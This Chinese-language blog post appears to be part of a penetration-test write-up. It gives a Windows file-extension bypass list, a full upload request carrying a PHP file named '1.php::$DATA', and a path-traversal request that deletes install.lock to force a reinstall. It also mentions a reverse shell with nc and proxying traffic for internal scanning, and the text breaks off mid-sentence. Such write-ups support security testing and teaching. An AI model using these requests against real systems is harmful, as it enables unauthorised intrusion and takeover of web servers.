主页 > 网络知识 > 利用sql渗透(2)

利用sql渗透(2)

 

报告,我已打入地方内部

 

这个方法中,type为3的时候是上传文件的,然后传入Upload::file方法。

 

报告,我已打入地方内部

 


但是在这个方法中判断了后缀名不能为php,但是在win的系统中,可以通过以下的一些方法绕过。

.php. .php(空格) .php:1.jpg .php::$DATA .php::$DATA……. 等等、、、

经过尝试,发现使用1.php::$DATA这样的方式可以绕过,构造的post数据包为:

POST /index.php/admin/setting.system_config/view_upload.html HTTP/1.1 Host: xxx.com Content-Length: 403 Cache-Control: max-age=0 Origin: http://xxx.com Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryP7jKNcoemK2sybZb User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: ?tab_id=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=es9ef1h1c9i0t21brcrlqigfmt Connection: close ------WebKitFormBoundaryP7jKNcoemK2sybZb Content-Disposition: form-data; site_logo ------WebKitFormBoundaryP7jKNcoemK2sybZb Content-Disposition: form-data; 3 ------WebKitFormBoundaryP7jKNcoemK2sybZb Content-Disposition: form-data;; filename="1.php::$DATA" Content-Type: image/png <?php phpinfo(); ?> ------WebKitFormBoundaryP7jKNcoemK2sybZb--


成功上传文件,但是这个文件上传需要后台登录才能上传,后台之前就已经爆破过了,没有爆破出来账号密码。但是这个程序有install文件,根据经验知道程序安装文件都会在安装后创建一个文件,来判断是否已经安装,所以在看看是否和我想的一样。

 

报告,我已打入地方内部

 

可以看到确实是生成了一个install.lock文件来判断是否安装成功,那么我们可以通过之前的任意文件删除漏洞来删除这个文件让系统进行重装。但是这个删除文件,对系统进行重装,这就得问问裁判组能不能让了啊,经常协商,他们觉得这个程序不重要,在能保证不破坏程序的时候可以做。既然他们说可以了,那么我就小心翼翼的构造一下post包,别真的给程序破坏了。
利用漏洞拿到shell 删除install.lock文件的数据包:

POST /index.php/admin/system.System_Upgradeclient/setcopydel HTTP/1.1 Host: Content-Length: 26 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=8itmp7itfo1va6uu7bu0ouhgos Connection: close id=/../install/install.lock&ids=1

 

 

报告,我已打入地方内部

 

返回值是成功的,看来没有问题,那就到重装系统的时候了,为了不对系统的数据造成破坏,我们对系统安装需要连接的mysql放到自己的服务器中。

 

报告,我已打入地方内部

 

成功登录后台,然后上传shell,还是之前的那个数据包,没有什么好说的,拿到shell后我用nc反弹一下,查看了系统上都有什么程序,发现这个系统上存在五个程序。

 

报告,我已打入地方内部

 

既然上来了,那就收集一下信息,然后把流量代理出去扫描一下,结果发现:
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!